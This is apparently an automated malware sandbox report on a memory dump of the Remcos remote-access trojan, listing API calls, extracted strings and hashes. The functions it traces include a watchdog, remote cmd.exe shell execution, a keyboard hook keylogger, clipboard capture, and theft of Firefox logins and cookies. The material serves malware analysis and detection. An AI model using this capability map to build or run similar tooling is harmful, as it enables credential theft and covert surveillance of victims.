                            control_flow_graph 478 40163e-401644 479 401646-401648 478->479 480 401649-401654 478->480 481 401656 480->481 482 40165b-401665 480->482 481->482 483 401667-40166d 482->483 484 401688-401689 call 43229f 482->484 483->484 486 40166f-401674 483->486 487 40168e-40168f 484->487 486->481 488 401676-401686 call 43229f 486->488 489 401691-401693 487->489 488->489
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                            • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                            • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                            • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 492 44d2b4-44d2c1 call 443005 494 44d2c6-44d2d1 492->494 495 44d2d7-44d2df 494->495 496 44d2d3-44d2d5 494->496 497 44d31f-44d32d call 443c92 495->497 498 44d2e1-44d2e5 495->498 496->497 500 44d2e7-44d319 call 445fb3 498->500 504 44d31b-44d31e 500->504 504->497
                            APIs
                              • Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                            • _free.LIBCMT ref: 0044D320
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                            • Instruction ID: 6435cefd8bbe106a332e767b8e47ea9a619cae55f612b2c95de9f127ac4edb1d
                            • Opcode Fuzzy Hash: 3263e86e01d89d9b2c949f26067d012f8e3513974416179447fc4125dbbefc63
                            • Instruction Fuzzy Hash: 260149736003056BF321CF69D885E5AFBE8FB89374F25061EE585832C0EA34A905C738

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 505 443005-443010 506 443012-44301c 505->506 507 44301e-443024 505->507 506->507 508 443052-44305d call 43ad91 506->508 509 443026-443027 507->509 510 44303d-44304e RtlAllocateHeap 507->510 515 44305f-443061 508->515 509->510 511 443050 510->511 512 443029-443030 call 442a57 510->512 511->515 512->508 518 443032-44303b call 440480 512->518 518->508 518->510
                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                            • Instruction ID: 6f1ff5b5ffdcc79539d97ae047dfd157567b1d653d04e58146e0509186e3fe0c
                            • Opcode Fuzzy Hash: 8a82d2413be822b6e30d7260cb8c0ab5a5cb0f0d071671a377993aa538de489b
                            • Instruction Fuzzy Hash: A0F0B43220022466FB319E229C01A5B3749AF42FA2F158227BC04E62C9CA78DE1182AD

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 521 443649-443655 522 443687-443692 call 43ad91 521->522 523 443657-443659 521->523 531 443694-443696 522->531 524 443672-443683 RtlAllocateHeap 523->524 525 44365b-44365c 523->525 527 443685 524->527 528 44365e-443665 call 442a57 524->528 525->524 527->531 528->522 533 443667-443670 call 440480 528->533 533->522 533->524
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                            • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                            • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                            • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                              • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                              • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                              • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                            • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                            • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                            • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                            • API String ID: 3018269243-1736093966
                            • Opcode ID: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                            • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                            • Opcode Fuzzy Hash: 0994219a8e8a2e6fdacb02da6b6c9aac93029fb7835260760d01e793a2ba6ee3
                            • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 00406D4A
                            • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                            • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                              • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                              • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                              • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                              • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                              • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                              • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                              • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                            • DeleteFileA.KERNEL32(?), ref: 0040768E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                            • API String ID: 1385304114-1507758755
                            • Opcode ID: 486b9b13a9e0af661d0ec35c4c2a5e664efc39ece2783de0a02d2c3891ac1a86
                            • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                            • Opcode Fuzzy Hash: 486b9b13a9e0af661d0ec35c4c2a5e664efc39ece2783de0a02d2c3891ac1a86
                            • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 004056C6
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                            • __Init_thread_footer.LIBCMT ref: 00405703
                            • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                            • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                              • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                            • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                            • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                            • CloseHandle.KERNEL32 ref: 00405A03
                            • CloseHandle.KERNEL32 ref: 00405A0B
                            • CloseHandle.KERNEL32 ref: 00405A1D
                            • CloseHandle.KERNEL32 ref: 00405A25
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                            • String ID: SystemDrive$cmd.exe
                            • API String ID: 2994406822-3633465311
                            • Opcode ID: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                            • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                            • Opcode Fuzzy Hash: 45804b196eb615b74f37731f9156c820bde623197d48a39944e1cd78d62eaab2
                            • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                            • FindClose.KERNEL32(00000000), ref: 0040AB0A
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                            • FindClose.KERNEL32(00000000), ref: 0040AC53
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                            • API String ID: 1164774033-3681987949
                            • Opcode ID: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                            • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                            • Opcode Fuzzy Hash: ca0fae3423e82ba65057aab1becec6cc490b3020935d7fd6147cf858be723e25
                            • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                            • FindClose.KERNEL32(00000000), ref: 0040AD0A
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                            • FindClose.KERNEL32(00000000), ref: 0040ADF0
                            • FindClose.KERNEL32(00000000), ref: 0040AE11
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Close$File$FirstNext
                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 3527384056-432212279
                            • Opcode ID: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                            • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                            • Opcode Fuzzy Hash: 73f140f6d35823a17bd4706e2565cdbe6c65283cd980cbef6400db2aba249c94
                            • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                            APIs
                            • OpenClipboard.USER32 ref: 00414EC2
                            • EmptyClipboard.USER32 ref: 00414ED0
                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                            • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                            • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                            • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                            • CloseClipboard.USER32 ref: 00414F55
                            • OpenClipboard.USER32 ref: 00414F5C
                            • GetClipboardData.USER32(0000000D), ref: 00414F6C
                            • GlobalLock.KERNEL32(00000000), ref: 00414F75
                            • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                            • CloseClipboard.USER32 ref: 00414F84
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                            • String ID:
                            • API String ID: 3520204547-0
                            • Opcode ID: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                            • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                            • Opcode Fuzzy Hash: 7af418065d64d393ef04eab576563171d8b43fad0296cfc06dd8feeb27fac25d
                            • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0$1$2$3$4$5$6$7
                            • API String ID: 0-3177665633
                            • Opcode ID: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                            • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                            • Opcode Fuzzy Hash: d8735d6a0333336ade1e6f6e2efec2098777929bb537579fb175260dc37f0ebb
                            • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                            APIs
                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                            • GetLastError.KERNEL32 ref: 00418771
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                            • String ID:
                            • API String ID: 3587775597-0
                            • Opcode ID: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                            • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                            • Opcode Fuzzy Hash: a389468ef3a4b2ac6aa5ba8bc00e05a97baae6139e6da71d4e03c11964763bc0
                            • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                            • FindClose.KERNEL32(00000000), ref: 0040B3BE
                            • FindClose.KERNEL32(00000000), ref: 0040B3E9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 1164774033-405221262
                            • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                            • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                            • Opcode Fuzzy Hash: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                            • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                              • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                            • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                            • String ID:
                            • API String ID: 2341273852-0
                            • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                            • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                            • Opcode Fuzzy Hash: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                            • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                            APIs
                              • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                            • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                            • SetLastError.KERNEL32(0000000E), ref: 0041082E
                              • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                            • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                            • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                            • SetLastError.KERNEL32(0000045A), ref: 0041098F
                              • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                              • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                            • String ID: $.F
                            • API String ID: 3950776272-1421728423
                            • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                            • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                            • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                            • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                            • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                            • GetLastError.KERNEL32 ref: 00409375
                              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                            • TranslateMessage.USER32(?), ref: 004093D2
                            • DispatchMessageA.USER32(?), ref: 004093DD
                            Strings
                            • Keylogger initialization failure: error , xrefs: 00409389
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                            • String ID: Keylogger initialization failure: error
                            • API String ID: 3219506041-952744263
                            • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                            • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                            • Opcode Fuzzy Hash: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                            • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                            APIs
                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                            • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressCloseCreateLibraryLoadProcsend
                            • String ID: SHDeleteKeyW$Shlwapi.dll
                            • API String ID: 2127411465-314212984
                            • Opcode ID: 3a8f36ea34958f1437b96a761794d04628548da7921348726e3bd1b1d4fd3bc5
                            • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                            • Opcode Fuzzy Hash: 3a8f36ea34958f1437b96a761794d04628548da7921348726e3bd1b1d4fd3bc5
                            • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                            APIs
                            • _free.LIBCMT ref: 00446741
                            • _free.LIBCMT ref: 00446765
                            • _free.LIBCMT ref: 004468EC
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                            • _free.LIBCMT ref: 00446AB8
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                            • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                            • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                            • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                            APIs
                              • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                              • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                              • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                            • Sleep.KERNEL32(00000BB8), ref: 0040E243
                            • ExitProcess.KERNEL32 ref: 0040E2B4
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseExitOpenProcessQuerySleepValue
                            • String ID: 3.8.0 Pro$override$pth_unenc$!G
                            • API String ID: 2281282204-1386060931
                            • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                            • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                            • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                            • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                            APIs
                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                            • InternetCloseHandle.WININET(00000000), ref: 00419407
                            • InternetCloseHandle.WININET(00000000), ref: 0041940A
